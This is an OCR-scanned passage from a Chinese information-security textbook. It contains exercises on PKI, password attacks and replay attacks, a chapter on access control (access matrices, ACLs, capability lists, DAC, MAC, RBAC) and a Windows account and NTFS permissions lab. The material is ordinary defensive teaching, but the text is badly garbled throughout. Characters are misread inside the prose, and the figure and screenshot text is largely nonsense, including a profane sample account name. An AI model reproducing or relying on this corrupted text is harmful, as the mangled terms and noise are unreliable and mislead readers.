查阅 资料 , 简 述 有 关 PKI 的 标准 及 其 相关 产品 。 
PKI 可 以 提供 哪些 安全 服务 ? PKI 体系 中 包含 了 哪些 与 信任 有 关 的 概念 ? 
收集 国内 外 有 关 认 证 的 网 站 信息 ,简要 说 明 各 网 站 的 特点 。 
收集 国内 外 有 关 认 证 的 最 新 动态 。 
简 述 口令 可 能 会 遭受 哪些 攻击 。 
假定 只 允许 使 用 26 个 英文 字母 构造 口令 ,在 下 列 情况 下 各 可 以 构造 出 多 少 条 口令 ? 
口令 最 多 可 以 使 用 个 字符 ,n= 二 4,6.,8, 不 区 分 大 小 写 。 
口令 最 多 可 以 使 用 个 字符 ,n= 二 4,6,8, 区 分 大 小 写 。 
编写 一 个 口令 生成 程序 。 程 序 以 长 度 5( 可 以 取 s==8,16,32,64) 的 随机 二 进 制 种子 


作为 输入 : 


3， 
20. 
21, 


让 多 名 用 户 使 用 你 的 程序 生成 口令 ,记录 有 多 少 人 选择 了 相同 的 事件 。 
生成 一 个 口令 并 加 密 。 然 后 让 人 通过 尝试 随机 数 种 子 的 所 有 值 进行 口令 攻击 。 事 
先 要 给 定 一 个 猜测 次 数 的 期 望 值 。 

简 述 生物 特征 认证 的 发 展 趋势 。 

如 何 保护 IC 卡 的 安全 ? 

在 身份 验证 中 ,可 能 会 遇 到 重 放 攻 击 。 重 放 具 有 如 下 几 种 形式 : 

简单 重 放 : 攻击 者 简单 地 复制 信息 ,经 过 一 段 时 间 后 ,再 重 放 原来 的 信息 。 

重 放 不 能 被 检测 到 : 这 时 ,原始 的 信息 不 能 到 达 , 只 有 重 放 信息 到 达 目 的 地 。 

没有 定义 的 重 放 返 回 : 发 送 者 这 时 很 难 确定 是 发 送信 息 还 是 接收 信息 。 


请 考虑 如 何 能 确定 信息 是 不 是 重 放 的 信息 ? 


22, 


请 画 出 带 有 时 间 戳 的 基于 秘密 密 钥 的 身份 验证 过 程 。 
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第 3 章 访问 汉 训 


信息 系统 中 的 一 切 活动 都 是 由 访问 动作 引起 的 。 一 个 信息 系统 当然 不 允许 非法 用 户 访 
问 , 即 使 是 合法 用 户 也 不 是 就 可 以 访问 系统 的 所 有 资源 或 者 对 系统 的 某 一 资源 进行 为 所 和 欲 
为 的 访问 操作 。 访 问 控制 (access control) 就 是 基于 这 种 考虑 的 安全 机 制 。 

访问 控制 分 为 系统 访问 控制 和 网 络 访问 控制 。 

系统 访问 控制 是 从 系统 资源 安全 保护 的 角度 对 要 进行 的 访问 进行 授权 (authorization) 
控制 。 它 从 访问 的 角度 将 系统 对 象 分 为 主体 (subject) 和 客体 (object) 两 类 。 主 体 也 称 访问 
发 起 者 ,主要 指 用 户 ,用户 组 .进程 以 及 服务 等 ;客体 也 称 资源 ,主要 指 文件 .目录 、 机 器 等 。 
授权 就 是 赋予 主体 一 定 的 权限 (修改 .查看 等 ) ,赋予 客体 一 定 的 访问 属性 (如 读 、 写 .添加 、 执 
行 .发 起 连接 等 ) ,同时 在 主体 与 客体 之 间 建 立 一 春 安 全 访问 视 则 ,通过 对 客体 的 恋 出 、 写 人 、 
修改 .删除 .运行 等 管理 ,确保 主体 对 客体 的 访问 是 经 过 授权 的 ,同时 要 拒绝 非 授权 的 访问 ， 
以 保证 信息 的 机 密 性 、 完 整 性 和 可 用 性 。 

广义 地 讲 ,身份 认证 也 是 一 种 访问 控制 一 一 进入 性 访问 控制 或 鉴别 (authentication) 性 
访问 控制 ,目的 是 检验 主体 身份 的 合法 性 ,是 信息 系统 安全 的 第 一 道 屏障 。 它 控制 哪些 用 户 
能 够 登录 到 系统 (服务 器 ) 并 获取 系统 资源 ,控制 准许 用 户 进 入 的 时 间 和 准许 他 们 在 哪 台 机 
器 上 访问 。 这 一 过 程 就 是 身份 认证 过 程 , 通 常 可 分 为 3 个 步骤 : 用 户 名 的 识别 与 验证 .用 户 
口令 的 识别 与 验证 .用户 账号 的 默认 限制 检查 。3 步 中 只 要 任何 一 关 未 过 ,该 用 户 便 不 能 进 
入 该 系统 。 这 里 介绍 的 访问 控制 也 可 称 为 授权 (authorization) 性 访问 控制 或 权限 控制 ,如 
图 3.1 所 示 , 它 是 在 身份 认证 的 基础 上 对 访问 请 求 设置 的 第 2 道 安全 防线 。 


访问 请 求 访 
四 制 


图 3.1 用 户 对 资源 访问 的 过 程 


0OC 


< 


Bb 


网 络 访问 控制 用 于 限制 外 部 对 网 络 服务 的 访问 以 及 系统 内 部 用 户 对 外 部 的 访问 。 它 的 
主要 技术 是 隔离 ,分 为 逻辑 隔离 和 物理 隔离 。 


3.1 系统 访问 控制 


3.1.1 访问 控制 的 二 元 关系 描述 


访问 控制 用 一 个 二 元 组 (控制 对 象 ,访问 类 型 ) 来 表示 。 其 中 的 控制 对 象 表示 系统 中 一 
切 需 要 进行 访问 控制 的 资源 ,访问 类 型 是 指 对 于 相应 的 受 控 对 象 的 访问 控制 ,如 读 取 、 修 改 、 
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访问 控制 二 元 组 有 许多 描述 形式 。 下 面 介 绍 几 种 常用 的 形式 。 

1. 访问 控制 矩阵 

访问 控制 矩阵 也 称 访 问 许可 矩 阵 , 它 用 行 表 示 客 体 , 列 表示 主体 ,在 行 和 列 的 交叉 点 上 
设 定 访问 权限 。 表 3. 1 是 一 个 访问 控制 矩阵 的 例子 。 表 中 ,一 个 文件 的 Own 权限 的 含义 是 


可 以 授予 (authorize) 或 者 撤销 (revoke) 其 他 用 户 对 该 文件 的 访问 控制 权限 。 例 如 , 张 三 对 
Filel 具有 Own 权限 ,所 以 张 三 可 以 授予 或 撤销 李 四 和 王 五 对 Filel 的 读 (R) 写 (W) 权 限 。 


表 3.1 一 个 访问 控制 矩阵 的 例子 


客体 (objects) 
主体 (subjects) 
Filel File2 File3 File4 
张 三 Own,R,W Own,R,W 
李 四 R Own:R,W Ww R 
于 者 R,W 及 Own,R,W 
2. 授权 关系 表 


授权 关系 表 (authorization relations) 描 述 了 主体 和 客体 之 间 各 种 授权 关系 的 组 合 。 表 
3.2 是 表 3. 1 的 授权 关系 表 的 一 个 例子 。 


表 3.2 授权 关系 表 的 一 个 例子 


主体 访问 权限 客体 主体 访问 权限 客体 
张 三 Own Filel 李 四 Ww File2 
张 三 R Filel 李 四 Ww File3 
张 三 Ww Filel 李 四 R File4 
张 三 Own File3 下 五 R Filel 
张 三 R File3 王 五 Ww Filel 
张 三 Ww File3 王 五 R File2 
李 四 R Filel 王 五 Own File4 
李 四 Own File2 王 五 R File4 
李 四 R File2 王 五 Ww File4 


授权 关系 表 便 于 使 用 关系 数据 库 进行 存储 。 只 要 按照 客体 进行 排序 ,就 得 到 了 与 访问 
能 力 表 相当 的 二 维 表 ; 按 照 主 体 进行 排序 ,就 得 到 了 与 访问 控制 表 相 当 的 二 维 表 。 

例如 , 当 用 户 或 应 用 程序 试图 访问 一 个 文件 时 ,首先 需要 通过 系统 调用 打开 文件 。 在 打 
开 文 件 之 前 ,访问 控制 机 制 被 调用 。 访 问 控制 机 制 利 用 访问 控制 表 、 访 问 权力 表 或 访问 控制 
和 矩阵 等 检查 用 户 的 访问 权限 。 如 果 在 用 户 的 访问 权限 内 , 则 可 以 继续 打开 文件 ;如 果 用 户 超 
出 授权 权限 , 则 访问 被 拒绝 ,产生 错误 信息 并 退出 。 


3. 访问 能 力 表 


能 力 (capability) 也 称 权 能 ,是 受 一 定 机 制 保护 的 客体 标志 ,标记 了 某 一 主体 对 客体 的 
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访问 权限 : 某 一 主体 对 某 一 客体 有 无 访问 能 力 , 表 示 了 该 主体 能 不 能 访问 那个 客体 ;而 具有 
什么 样 的 能 力 ,表示 能 对 那个 客体 进行 一 些 什么 样 的 访问 。 它 也 是 一 种 基于 行 的 自主 访问 
控制 策略 。 图 3. 2 是 表 3. 1 所 示 的 访问 控制 矩阵 的 能 力 表 的 例子 。 


张 三 一 =| Filel File3 
Own Own 
R R 
W Ww 
本 四 一 =| Filel | File2 File3 File4 
Own 
R R Ww R 
Ww 
EH 一 ~ ilel | File3 File4 
Own 
R R R 
Ww Ww 
@— @ 


图 3.2 访问 能 力 表 的 例子 


访问 能 力 表 允 许 在 进程 运行 期 间 动 态 地 发 放 、 回 收 、 删 除 或 增加 某 些 权 力 ,执行 速度 比 
较 快 ,还 可 以 定义 一 些 系统 事先 不 知道 的 访问 类 型 。 此 外 ,访问 能 力 表 着 眼 于 某 一 主体 的 访 
问 权限 ,从 主体 出 发 描述 控制 信息 ,很 容易 获得 一 个 主体 被 授权 可 以 访问 的 客体 及 其 权限 ， 
但 要 从 客体 出 发 获得 哪些 主体 可 以 访问 它 , 就 困难 了 。 目 前 使 用 能 力 表 实 现 的 自主 访问 控 
制 系统 已 经 不 多 。 


4. 访问 控制 列表 


访问 控制 列表 (access control list,ACL) 与 访问 能 力 表 正 好 相反 ,是 从 客体 出 发 描述 控 
制 信息 ,可 以 用 来 对 某 一 资源 指定 任意 一 个 用 户 的 访问 权限 。 这 种 方式 给 每 个 客体 建立 一 
个 ACL( 访 问 控 制 表 ) ,记录 该 客体 可 以 被 哪些 主体 访问 以 及 访问 的 形式 。 它 是 一 种 基于 列 
的 自主 访问 控制 策略 。 图 3. 3 是 表 3. 1 的 访问 控制 表 的 例子 。 可 以 看 出 ,每 个 ACL 包括 一 
个 ACL 头 和 零 个 或 多 个 ACE( 访 问 控制 项 ) 。 

ACL 的 优点 是 可 以 容易 地 查 出 对 某 一 特定 资源 拥有 访问 权 的 所 有 用 户 , 有 效 地 实施 授 
权 管 理 ,是 目前 采用 的 最 多 的 一 种 实现 形式 。Windows NT/2000/XP 的 资源 (文件 .设备 、 
邮件 槽 .已 命名 的 和 未 命名 的 管道 .进程 线程 .事件 . 互 斥 体 、 信 号 量 、 可 等 待定 时 器 .访问 令 
牌 .窗口 站 、 网 络 共 享 、 服 务 .注册 表 .打印 机 等 ) 访 问 就 是 采用 这 种 方式 。 

ACL 是 按照 对 象 进行 访问 的 操作 系统 。 但 是 使 用 ACL 进行 访问 权限 的 管理 , 仅 依靠 
单个 主体 非常 麻烦 。 为 此 ,通常 将 用 户 按 组 进行 组 织 ,用 户 也 可 以 从 用 户 组 取得 访问 权限 。 
在 UNIX 中 , 附 在 文件 上 的 简单 的 ACL 允许 对 用 户 、 组 和 其 他 三 类 主体 规定 基本 访问 
模式 。 
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Filel 一 一 | 张 三 李 四 En 
Own 
R R R 
W W 
© © 
File2 一 一 一 地 四 让 我 
Own 
R R 
WwW 
© 
File3 一 一 一 张 三 李 四 
Own 
R 
W WwW 
®@© 
File4 一 一 一 地 四 主页 
Own 
R R 
W 
© . 


图 3.3 访问 控制 列表 的 例子 


3.1.2 自主 访问 控制 与 强制 访问 控制 


资源 的 所 有 者 往往 是 资源 的 创建 者 。 大 多 数 操作 系统 支持 资源 所 有 权 的 概念 ,并 且 在 
决定 访问 控制 策略 时 考虑 资源 所 有 权 。 基 于 所 有 权 的 访问 控制 可 以 有 两 种 基本 的 策略 : 自 
主 访问 控制 (discretionary access control,DAC) 和 强制 访问 控制 (mandatory access control， 


MAC) 。 
1. 自主 访问 控制 策略 


自主 访问 控制 是 目前 计算 机 系统 中 应 用 最 广泛 的 一 种 策略 ,主流 操作 系统 Windows 
NT Server、UNIX 系统 ,以 及 防火 墙 (ACLs) 等 都 是 采用 自主 型 的 访问 控制 策略 。 它 的 基本 
思想 是 ,资源 的 所 有 者 可 以 对 资源 的 访问 进行 控制 ,任意 规定 谁 可 以 访问 其 资源 ,自主 地 直 
接 或 间接 地 将 权限 传 给 (分 发 给 ) 主体 。 例 如 ,用 户 A 对 客体 O 具有 访问 权限 ,而 B 没 有 。 
当 A 将 对 O 的 访问 权限 传递 给 B 后 ,B 就 有 了 对 O 的 访问 权限 。 

口令 (password) 机 制 就 是 一 种 基于 行 的 自主 访问 控制 策略 。 它 要 求 每 个 都 相应 地 有 一 
个 口令 。 主 体 对 客体 进行 访问 前 必须 向 操作 系统 提供 该 客体 的 口令 。 采 用 这 种 机 制 的 系统 
有 IBM 公司 的 MVS 和 CDC 公司 的 MOS 等 。 

DAC 的 优点 是 应 用 灵活 与 可 扩展 性 ,所 以 经 常 被 用 于 商业 系统 。 缺 点 是 ,权限 传递 很 
容易 造成 漏洞 ,安全 级 别 比 较 低 ,不 太 适 合 网 络 环境 ,主要 用 于 单个 主机 上 。 

通常 DAC 通过 访问 控制 矩阵 来 限定 哪些 主体 针对 哪些 客体 可 以 执行 什么 操作 。 但 
是 ,目前 操作 系统 在 实现 自主 访问 控制 时 ,不 是 利用 整个 访问 控制 矩阵 ,而 是 基于 访问 控制 
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和 矩阵 的 行 或 列 来 表达 访问 控制 信息 ,这样 就 可 以 非常 灵活 地 对 策略 进行 调整 。 
2. 强制 访问 控制 策略 


强制 访问 控制 (MAC) 也 称 系统 访问 控制 , 它 的 基本 思想 是 系统 要 “强制 "主体 服从 访问 
控制 政策 : 系统 (系统 管理 员 ) 给 主体 和 客体 分 配 了 不 同 的 安全 属性 ,用 户 不 能 改变 自身 或 
任何 客体 的 安全 属性 , 即 不 允许 单个 用 户 确定 访问 权限 ,只 有 系统 管理 员 才 可 以 确定 用 户 或 
用 户 组 的 访问 权限 。 

MAC 主要 用 于 多 层次 安全 级 别 的 系统 (如 军事 系统 ) 中 。 它 预先 将 主体 和 客体 进行 分 
级 ,定义 出 一 些 安全 等 级 (如 高 密级 .机密 级、 秘密 级 无 密级 等 ) 并 用 对 应 的 标签 进行 标识 : 
对 于 主体 称 做 许可 级 别 和 许可 标签 ,对 于 客体 称 做 安全 级 别 和 敏感 性 标签 。 用 户 必 须 遵守 
依据 安全 策略 划分 的 安全 级 别 的 设 定 以 及 有 关 访 问 权 限 的 设 定 。 

由 于 主体 有 既定 的 许可 级 别 , 客 体 也 有 既定 的 安全 级 别 , 因 此 主体 对 客体 能 否 执行 特定 
的 操作 ,取决 于 二 者 的 安全 属性 之 间 的 关系 。 例 如 对 于 信息 (文件 ) 的 访问 ,可 以 定义 如 下 4 
种 关系 : 

(1) 下 读 (read down) : 用 户 级 别 高 于 信息 级 别 的 读 操作 ; 

(2) 上 读 (read up): 用 户 级 别 低 于 信息 级 别 的 读 操作 ; 

(3) 下 写 (write down) : 用 户 级 别 高 于 信息 级 别 的 写 操 作 ; 

(4) 上 写 (write up): 用 户 级 别 低 于 信息 级 别 的 写 操作 。 

当 用 户 提出 访问 请 求 时 ,系统 对 主 、 客 体 的 安全 属性 进行 比较 ,决定 该 主体 是 否 可 以 对 
所 请 求 的 客体 进行 访问 。 当 一 个 主体 (进程 ) 要 访问 客体 ,其 许可 标签 必须 满足 下 面 的 条 件 : 

(1) 主体 车 要 对 客体 具有 写 访 问 的 权限 , 则 其 许可 级 别 必 须 被 客体 的 安全 级 别 支配 。 

(2) 主体 车 要 对 客体 具有 读 访问 的 权限 , 则 其 许可 级 别 必 须 支 配 客 体 的 安全 级 别 。 

在 典型 的 应 用 中 ,MAC 使 用 两 种 访问 控制 关系 : 上 读 / 下 写 一 一 用 来 保证 数据 完整 性 ， 
下 读 / 上 写 用 来 保证 数据 机 密 性 。 下 读 / 上 写 相 当 于 在 一 个 层次 组 织 中 ,上 级 领导 可 以 
看 下 级 的 资料 ,而 下 级 不 能 看 上 级 的 资料 ,但 可 以 向 上 级 写 资料 。 图 3.4 是 这 两 种 方式 的 示 


意图 。 
MAC 比 DAC 具有 更 强 的 访问 控制 能 力 ,但 实现 的 工作 量 bh ei 
大 ,管理 不 便 ,不 够 灵活 。 - 


强制 访问 控制 和 自主 访问 控制 有 时 会 结合 使 用 。 例 如 , 系 
统 可 能 首先 执行 强制 访问 控制 来 检查 用 户 是 否 有 权限 访问 一 
个 文件 组 (这 种 保护 是 强制 的 ,也 就 是 说 : 这 些 策略 不 能 被 用 
户 更 改 ) ,然后 再 针对 该 组 中 的 各 个 文件 制定 相关 的 访问 控制 


秘密 秘密 
列表 (自主 访问 控制 策略 ) 。 
3.1.3 基于 角色 的 访问 控制 策略 ei Eh 


角色 (role) 是 指 一 个 组 织 或 任务 中 的 岗位 、 职 位 或 分 工 。 图 3.4 下 读 /上 写 示意 
角色 需要 人 去 扮演 。 一 般 来 说 ,一 个 角色 并 非 只 有 一 人 扮演 ， 
如 会 计 这 个 角色 往往 需要 多 个 人 ,并 且 一 个 人 可 能 会 从 事 不 同 的 角色 。 基 于 角色 的 访问 控 
。， 908 。 


允许 读 取 允许 写 入 


制 (role-base access control,RBAC) 就 是 基于 这 样 一 种 考虑 而 提出 的 访问 控制 策略 。 由 于 
角色 比 个 体 用 户 具 有 较 大 的 稳定 性 ,这 种 授权 管理 比 针 对 个 体 的 授权 管理 ,在 可 操作 性 和 可 


管理 性 方面 都 要 强 得 多 。 
如 图 3. 5 所 示 ,角色 实际 上 是 在 主体 (用 户 ) 与 客体 之 间 引 入 的 中 间 控 制 层 。 
客体 1 
用 户 1 
肌 且 本 客体 2 
户 3 客体 3 


图 3.5 角色 是 在 主体 与 客体 之 间 引 入 的 中 间 控 制 层 


在 RBAC 系统 中 ,要 求 明确 区 分 权限 (authority) 和 职责 (responsibility) 或 区 分 操作 与 
管理 ,使 二 者 互相 制约 。 

例 3.1 一 位 科 长 可 以 对 一 个 科 的 成 员 发 号 施 令 , 而 并 不 能 对 任何 科 的 科 员 发 号 施 令 。 
因为 从 权力 上 看 ,他 是 科 长 ,而 从 职责 上 来 说 ,他 只 是 某 一 个 科 的 科 长 ,并 非 所 有 科 的 科 长 。 
与 之 相似 ,对 于 一 个 具有 高 密级 (0 级 ) 许 可 级 的 用 户 来 说 ,不 可 以 访问 所 有 安全 级 别 为 0 级 
的 资源 ,因为 有 些 资 源 不 在 他 的 职责 范围 内 。 

例 3.2 一 个 可 以 访问 某 个 资源 集合 的 用 户 ,不 能 进行 该 资源 集合 的 访问 授权 ,因为 他 
没有 这 个 权限 。 

例 3.3 一 位 安全 主管 有 权 进 行 授权 分 配 , 但 不 能 同时 具有 访问 数据 资源 的 权力 。 

由 于 实现 了 权限 与 职责 的 逻辑 分 离 ,基于 角色 的 策略 极 大 地 方便 了 权限 管理 。 例 如 ,如 
果 一 个 用 户 的 职位 发 生变 化 ,只 要 将 用 户 当 前 的 角色 去 掉 , 加 入 代表 新 职务 或 新 任务 的 角色 
即 可 。 基 于 角色 的 访问 控制 方法 还 可 以 很 好 地 描述 角色 层次 关系 ,实现 最 少 权 限 原则 和 职 
责 分 离 的 原则 ,非常 适合 在 数据 库 应 用 层 的 访问 控制 ,因为 在 应 用 层 , 角 色 的 概念 比较 明显 。 

角色 由 系统 管理 员 定义 ,角色 成 员 的 增 减 也 只 能 由 系统 管理 员 执 行 ,只 有 系统 管理 员 才 
有 权 定 义 和 分 配角 色 , 并 且 授 权 规则 是 强加 给 用 户 的 ,用 户 只 能 被 动 地 接受 ,不 能 自主 地 决 
定 。 但 是 ,角色 的 控制 比较 灵活 ,根据 需要 可 以 将 某 些 角色 配置 得 接近 DAC ,而 让 某 些 角色 
接近 MAC。 


实验 7 用 户 账户 管理 与 访问 权限 设置 


1. 实验 目的 


(1) 掌握 在 一 个 系统 中 进行 用 户 账户 管理 的 方法 。 
(2) 掌握 在 一 个 系统 中 进行 访问 权限 设置 的 方法 。 


2. 实验 内 容 


(1) 在 一 个 系统 中 进行 用 户 账户 管理 (若是 在 Linux 系统 中 , 需 考虑 添加 批量 用 户 ) 和 
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安全 设置 。 
(2) 在 一 个 系统 中 进行 访问 权限 设置 (若是 在 Windows 2000 以 上 的 系统 中 , 需 基 于 
NTFS 进行 设置 ) 。 


3. 建议 环境 


在 一 种 操作 系统 环境 (如 Linux 或 Windows) 下 进行 账号 和 访问 权限 设置 ,以 及 进行 用 
户 管理 。 


4. 实验 示范 


Windows 中 账户 和 权限 的 设置 


Windows 2000/NT 拥有 强大 的 用 户 和 组 权限 管理 功能 ,在 保护 系统 安全 方面 有 着 独特 
的 应 用 。 通 过 为 不 同 用 户 分 配 相 应 权限 ,可 以 限制 其 对 系统 重要 文件 或 目录 的 访问 ,并 以 此 
达到 保护 系统 不 受到 病毒 和 黑客 侵犯 的 功能 。 

(1) Windows 中 的 账户 设置 

Q 单 击 “ 我 的 电脑 "一 “控制 面板 ”, 打 开 “ 控 制 面板 "对话 框 ,选择 “用 户 账户 ”, 如 图 3. 6 
所 示 。 


控制 面板 
文件 (E) 编辑 (E) 查看 (Z) 收藏 6) 工具 (IT) 帮助 (B) 
| @-@- 旋 国 辐 | wm 已 XN | 回 - 


i 地 址 (D) [ 吕 控制 面板 


| Wom 


时 ?到 和 视 四 


请 参 辣 | 
OB Mindows Vinte 
帮助 和 克 持 


二 
| CE 29 打印 机 和 其 它 硬 首 


网 络 和 Internet 连接 用 户 账户 
p22 
和 下 他 控制 面 板 这 项 


ES 于 加 /开除 性 序 日 期 、 时 间 、 刘 言 和 区 域 设置 


A py 声音 、 语 音 和 音频 设备 钙 助 功能 选项 


区 性 从 和 维护 网 安全 中 心 


图 3.6 “控制 面板 ”中 的 “用 户 账户 ” 


@ 双击 “用 户 账户 ”, 进 入 “用 户 账户 ”窗口 ,可 以 看 到 在 “挑选 一 项 任务 …” 中 有 一 些 选 
项 ,如 图 3.7 所 示 。 
@ 选择 “创建 一 个 新 账户 ”, 进 入 “用 户 账户 ”窗口 中 的 “为 新 账户 起 名 ”选项 卡 , 可 以 为 
新 账户 起 名 ,如 图 3. 8 所 示 。 
@ 为 新 用 户 输入 一 个 名 称 后 , 单 击 “ 下 一 步 ” 按 钮 ,打开 “挑选 一 个 账户 类 型 ”选项 卡 ,可 
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: 用 户 账户 


六 ”用户 账户 


用 户 账户 
国 用 户 帐户 关 型 
国 jj 织 用 记 | 


[EL 


图 3.7 “用 户 账户 ?窗口 


t 用 户 账户 


为 新 账户 起 名 
为 新 妥 户 涯 入 一 个 名 称 


son of a biteh 


这 个 名 称 会 出 现在 欢迎 屏幕 和 「 开 始 」 菜单 


图 3.8 为 新 账户 起 名 


以 为 新 用 户 选择 一 个 账户 类 型 。 图 3. 9 为 选择 “计算 机 管理 员 ” 选 项 时 的 页 


H 


这 类 账户 的 权力 有 : 
。 创建 ,更改 和 删除 账户 。 


i 显示 。 


。 101 。 


国 用 户 账 P 关 型 挑选 . 账户 类 ee 


使 用 计算 机 管理 员 账户 ,您 可 以 : 
。 创建 、 更 改 和 删除 账户 


。 进行 系统 范围 的 更 改 
。 安装 程序 并 访问 所 有 文件 


CE EEE Wy 


图 3.9 挑选 一 个 账户 类 型 一 一 “计算 机 管理 员 ” 


。 进行 系统 范围 的 更 改 。 
安装 程序 并 访问 所 有 文件 。 
图 3. 10 为 选择 “ 受 限 ” 账 户 类 型 时 的 页 面 显示 。 
用 户 账户 
四 上 -省 图 MEr 


了 解 K 
ee 挑选 一 个 账户 类 型 
〇 计算 机 管理 员 Q) @ 居 拭 TL] 


使 用 一 个 受 限 制 的 账户 ， 您 可 以 : 
。 更 改 


或 册 除 您 的 密码 
。 更 改 您 的 图 片 、 主 题 和 其 他 桌面 设置 
。 查看 您 创建 的 文件 
。 在 共享 文档 文件 夹 中 查看 文件 


ME 根据 程序 的 不 同 ， 用 户 可 能 需要 管理 员 权限 
它 - 


同样 ， 在 Yindows XP 或 Windows 2000 之 前 设计 的 程序 可 能 在 受 限 制 的 账户 中 不 能 
正确 运行 。 为 获得 最 佳 效果 ,请 选择 有 Desi gmed for Windows XP 微 标的 程序 ， 或 者 
要 运行 旧 的 程序 ， 选 择 “计算 机 管理 员 ” 账 户 类 型 . 


《上 一 步 @) C5 ] 取消 


图 3. 10 ”挑选 一 个 账户 类 型 一 一 “ 受 限 ” 
sa Os 


这 类 账户 的 权力 有 : 

更改 或 删除 您 的 密码 。 

。 更 改 您 的 图 片 .主题 和 其 他 桌面 设置 。 

。 查看 您 创建 的 文件 。 

。 在 共享 文档 文件 夹 中 查看 文件 。 

@ 用 户 类 型 选择 后 , 单 击 “ 创 建 账户 ”按钮 ,系统 进入 如 图 3. 11 所 示 的 页 面 ,提示 对 新 
建 账户 可 以 进行 的 操作 选择 。 


用户 账户 
Qt En 
相关 任务 
更 改 另 一 个 账户 


您 想 更 改 ur son of a bitch 的 账户 的 什 


创建 一 个 新 账户 入? 


加 更 收 各 称 国 二 二 到 面 蝇 
妥 限 的 账户 
创建 密码 


更 改 图 片 
更 区 账户 类 型 


删除 账户 


图 3.11 选择 对 新 建 账户 的 操作 


@ 选择 “创建 密码 ”选项 ,进入 图 3. 12 所 示 的 页 面 ,在 “输入 一 个 新 密码 ”文本 框 中 输入 
密码 。 

这 样 ,以 后 再 次 启动 系统 时 ,就 会 要 求 先 输入 账号 和 密码 。 不 同 的 账户 也 可 以 把 自己 的 
私人 文档 保存 到 “我 的 文档 ”文件 夹 中 ,把 该 文件 夹 设置 为 专用 。 

(2) Windows 2000/NT 中 的 组 策略 

在 Windows 2000/NT 中 ,用 户 被 分 成 许多 组 ,组 和 组 之 间 都 有 不 同 的 权限 。 当 然 ,一 
个 组 的 用 户 和 用 户 之 间 也 可 以 有 不 同 的 权限 。 下 面 是 一 些 常用 的 组 : 

QO Administrators 管理 员 组 

管理 员 可 以 执行 操作 系统 所 支持 的 所 有 功能 。Windows 2000/NT 的 默认 安全 设置 不 
限制 管理 员 对 任何 注册 表 或 文件 系统 对 象 的 访问 。 只 有 受信 任 的 人 员 才 可 以 成 为 该 组 
成 员 。 

© Power Users 高 级 用 户 组 

在 权限 设置 中 ,这 个 组 的 权限 是 仅 次 于 Administrators 的 。Power Users 可 以 执行 除 

s L098 a 


了 解 庙 
| 为 ur son of a biteh 的 账户 创建 一 个 密码 


正在 创建 一 个 好 的 密码 提 您 正在 为 ur son of a bitch 创 津 密码 。 如 果 你 这 样 微 ,ur son of a 
示 bitch 和 EFS 加 密 的 文件 ,个 人 证 书 以 及 保存 的 网 站 或 网 络 资 


国 正在 记 住 一 个 密码 
要 防止 在 将 来 丢失 数据 ,要求 uw son of a bitch 制作 一 张 密码 重 设 软盘 。 
输入 一 个 新 密码 ; 

[ 
再 次 输入 密码 以 确认 : 
[ 
如 果 密 码 包 合 大 写字 母 ， 它 们 每 次 都 必须 以 相同 的 大 小 写 方式 输入 。 
输入 一 个 单词 或 短语 作为 密码 提示 

[ 
所 有 使 用 这 台 计 算 机 的 人 都 可 以 看 见 密码 提示 , 


图 3.12 为 新 账户 创建 密码 


了 为 Administrators 组 保留 的 任务 以 外 的 其 他 任何 操作 系统 任务 。 分 配给 Power Users 组 
的 默认 权限 允许 Power Users 组 的 成 员 修改 整个 计算 机 的 设置 ,但 Power Users 不 具有 将 
自己 添加 到 Administrators 组 的 权限 。 

@@ Users 普通 用 户 组 

Users 组 提供 了 一 个 最 安全 的 程序 运行 环境 ,默认 安全 设置 旨 在 禁止 该 组 的 成 员 危 及 
操作 系统 和 已 安装 程序 的 完整 性 。 系 统 对 这 个 组 的 权限 如 下 : 

。 该 组 的 用 户 可 以 运行 经 过 验证 的 应 用 程序 ,但 不 可 以 运行 大 多 数 旧版 应 用 程序 。 

。 Users 可 以 关闭 工作 站 ,但 不 能 关闭 服务 器 。 

。 Users 可 以 创建 本 地 组 ,但 只 能 修改 自己 创建 的 本 地 组 。 

。 Users 不 能 修改 系统 注册 表 设 置 .操作 系统 文件 或 程序 文件 ,不 允许 该 组 成 员 修 改 

操作 系统 的 设置 或 用 户 资料 。 


中 Guests 来 宾 组 
Guests 与 普通 Users 的 成 员 有 同等 访问 权 , 但 来 宾 账 户 的 限制 更 多 。 
© Everyone 所 有 的 用 户 


计算 机 上 的 所 有 用 户 都 属于 这 个 组 。 
实际 上 ,还 有 一 个 组 也 很 常见 , 它 拥 有 和 Administrators 一 样 甚 至 比 其 更 高 的 权限 ,但 


是 这 个 组 不 允许 任何 用 户 的 加 入 ,在 查看 用 户 组 的 时 候 , 它 也 不 会 被 显示 出 来 , 它 就 是 Sys- 
tem 组 。 


(3) Windows 2000 的 NTFS 系统 
NTFS (new technology file system ,新 技术 文件 系统 ) 是 Microsoft 公司 为 了 弥补 FAT 
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(file allocation table, 文 件 分 配 表 ) 系 统 的 一 些 不 足 而 推出 的 一 项 技术 ,其 最 大 的 改进 就 是 
容错 性 和 安全 性 能 。 

基于 NTFS 卷 进 行 访问 权限 设置 非常 简单 。 右 击 一 个 NTFS 卷 或 NTFS 卷 下 的 一 个 
目录 ,选择 “属性 ”一 “安全 ”选项 就 可 以 对 一 个 卷 或 者 一 个 卷 下 面 的 目录 进行 权限 设置 。 这 
时 会 看 到 以 下 7 种 权限 : 

Q@“ 完 全 控制 "就 是 对 此 卷 或 目录 拥有 不 受 限 制 的 完全 访问 , 像 Administrators 在 所 有 
组 中 的 地 位 一 样 。 选 中 了 “完全 控制 ”下 面 的 @、@、@、、@ 项 属性 将 被 自动 选中 。 

@ “修改 " 则 像 Power Users, 选 中 了 “修改 ”, 下 面 的 @@、@、@@、@ 项 属性 将 被 自动 选中 。 
当下 面 的 任何 一 项 没有 被 选中 时 多 修改 ”条件 将 不 再 成 立 。 

@“ 读 取 和 运行 ?就 是 允许 读 取 和 运行 在 这 个 卷 或 目录 下 的 任何 文件 。“ 列 出 文件 夹 目 
录 ” 和 “ 读 取 ”是 “ 读 取 和 运行 "的 必要 条 件 。 

@“ 列 出 文件 夹 目 录 ” 是 指 只 能 浏览 该 卷 或 目录 下 的 子 目 录 , 不 能 读 取 , 也 不 能 运行 。 

@@“ 读 取 ” 是 指 能 够 读 取 该 卷 或 目录 下 的 数据 。 

@“ 写 人 ”就 是 能 往 该 卷 或 目录 下 写 人 数据 。 

Q@“ 特 别 ”* 是 对 以 上 6 种 权限 进行 细 分 。 


5. 实验 准备 

(1) 设计 在 一 个 系统 中 进行 用 户 账户 管理 的 步骤 。 

(2) 设计 在 一 个 系统 中 进行 访问 权限 设置 的 步骤 。 

6. 推荐 的 分 析 讨论 内 容 

